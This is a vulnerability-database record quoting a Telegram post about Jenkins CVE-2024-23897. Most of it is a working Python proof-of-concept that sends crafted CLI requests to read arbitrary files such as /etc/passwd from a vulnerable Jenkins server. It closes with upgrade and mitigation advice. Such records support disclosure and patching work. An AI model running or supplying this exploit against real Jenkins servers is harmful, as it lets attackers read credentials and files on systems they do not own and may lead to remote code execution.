{"uuid": "a6999d34-1950-42e6-b77c-7616520bca4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/poxek/3618", "content": "Jenkins RCE Arbitrary File Read CVE-2024-23897 \n\nA critical vulnerability in Jenkins. It allows RCE on the attacked machine through the vulnerable args4j module. This feature is enabled by default, and in Jenkins 2.441 and earlier, LTS 2.426.2 and earlier it cannot be disabled.\n\nPoC\nimport threading\nimport http.client\nimport time\nimport uuid\nimport urllib.parse\nimport sys\n\nif len(sys.argv) != 3:\n    print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')\n    exit()\n\ndata_bytes = b'\\x00\\x00\\x00\\x06\\x00\\x00\\x04help\\x00\\x00\\x00\\x0e\\x00\\x00\\x0c@' + sys.argv[2].encode() + b'\\x00\\x00\\x00\\x05\\x02\\x00\\x03GBK\\x00\\x00\\x00\\x07\\x01\\x00\\x05zh_CN\\x00\\x00\\x00\\x00\\x03'\ntarget = urllib.parse.urlparse(sys.argv[1])\nuuid_str = str(uuid.uuid4())\n\nprint(f'REQ: {data_bytes}\\n')\n\ndef req1():\n    conn = http.client.HTTPConnection(target.netloc)\n    conn.request(\"POST\", \"/cli?remoting=false\", headers={\n        \"Session\": uuid_str,\n        \"Side\": \"download\"\n    })\n    print(f'RESPONSE: {conn.getresponse().read()}')\n\ndef req2():\n    conn = http.client.HTTPConnection(target.netloc)\n    conn.request(\"POST\", \"/cli?remoting=false\", headers={\n        \"Session\": uuid_str,\n        \"Side\": \"upload\",\n        \"Content-type\": \"application/octet-stream\"\n    }, body=data_bytes)\n\nt1 = threading.Thread(target=req1)\nt2 = threading.Thread(target=req2)\n\nt1.start()\ntime.sleep(0.1)\nt2.start()\n\nt1.join()\nt2.join()\n\nUsage:\npython poc.py http://127.0.0.1:8888/ [/etc/passwd]\n\nUpdate:\nUpdate to Jenkins 2.442, LTS 2.426.3\n\nPatch:\nIf you cannot update to the latest version, disable access to the CLI; this should completely rule out the possibility of exploitation.\n\n\ud83c\udf1a @poxek", "creation_timestamp": "2024-01-26T10:20:52.000000Z"}